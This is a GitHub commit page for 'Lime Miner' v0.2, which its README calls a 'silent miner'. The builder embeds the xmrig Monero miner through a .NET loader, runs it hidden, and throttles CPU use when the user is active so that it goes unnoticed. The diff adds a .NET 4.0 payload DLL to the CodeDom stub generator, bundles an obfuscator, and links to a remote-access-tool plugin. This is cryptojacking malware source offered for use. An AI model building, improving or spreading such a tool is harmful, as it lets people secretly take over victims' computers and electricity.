Skip to content

Commit

Permalink
UPDATE v0.2
Browse files Browse the repository at this point in the history
Updated to new Monero algorithm
  • Loading branch information
Nyrotication committed Oct 20, 2018
1 parent dce6a71 commit a9d2a6e
Show file tree
Hide file tree
Showing 8 changed files with 20 additions and 2 deletions.
6 changes: 5 additions & 1 deletion Lime-Miner/Codedom.vb
Original file line number Diff line number Diff line change
Expand Up @@ -34,7 +34,11 @@ Public Class Codedom

Using R As New Resources.ResourceWriter(IO.Path.GetTempPath & "\" + Res + ".Resources")
' XMR DLL source code: https://github.com/NYAN-x-CAT/Lime-RAT/tree/master/Project/Plugins/XMR
R.AddResource(F.Resources_DLL, F.GZip(My.Resources.DLL))
If F.txtDotNET.Text = ".NET 4.0" Then
R.AddResource(F.Resources_DLL, F.GZip(My.Resources.DLL4))
Else
R.AddResource(F.Resources_DLL, F.GZip(My.Resources.DLL))
End If
R.Generate()
End Using

Expand Down
1 change: 1 addition & 0 deletions Lime-Miner/Lime-Miner.vbproj
Original file line number Diff line number Diff line change
Expand Up @@ -125,6 +125,7 @@
</ItemGroup>
<ItemGroup>
<Content Include="Icon.ico" />
<None Include="Resources\DLL4.dll" />
<None Include="Resources\dotNET_Reactor.exe" />
<None Include="Resources\DLL.dll" />
<None Include="Resources\nyan.gif" />
Expand Down
10 changes: 10 additions & 0 deletions Lime-Miner/My Project/Resources.Designer.vb

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

3 changes: 3 additions & 0 deletions Lime-Miner/My Project/Resources.resx
Original file line number Diff line number Diff line change
Expand Up @@ -130,4 +130,7 @@
<data name="dotNET_Reactor" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\dotNET_Reactor.exe;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</data>
<data name="DLL4" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\DLL4.dll;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</data>
</root>
Binary file modified Lime-Miner/Resources/DLL.dll
Binary file not shown.
Binary file added Lime-Miner/Resources/DLL4.dll
Binary file not shown.
Binary file added Lime-Miner/Resources/Thumbs.db
Binary file not shown.
2 changes: 1 addition & 1 deletion README.md
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@

<img src="https://i.imgur.com/xMwdvQv.gif">

# Lime Miner v0.1
# Lime Miner v0.2

A silent miner using .NET [Lime-Loader](https://github.com/NYAN-x-CAT/Lime-Loader) as a loader for [xmrig CPU miner](https://github.com/xmrig/xmrig).
The loader will determines PC status, If the user is idle, the miner will use 90% of CPU usage, If the user is active again the miner will lower to 50%
Expand Down

0 comments on commit a9d2a6e

Please sign in to comment.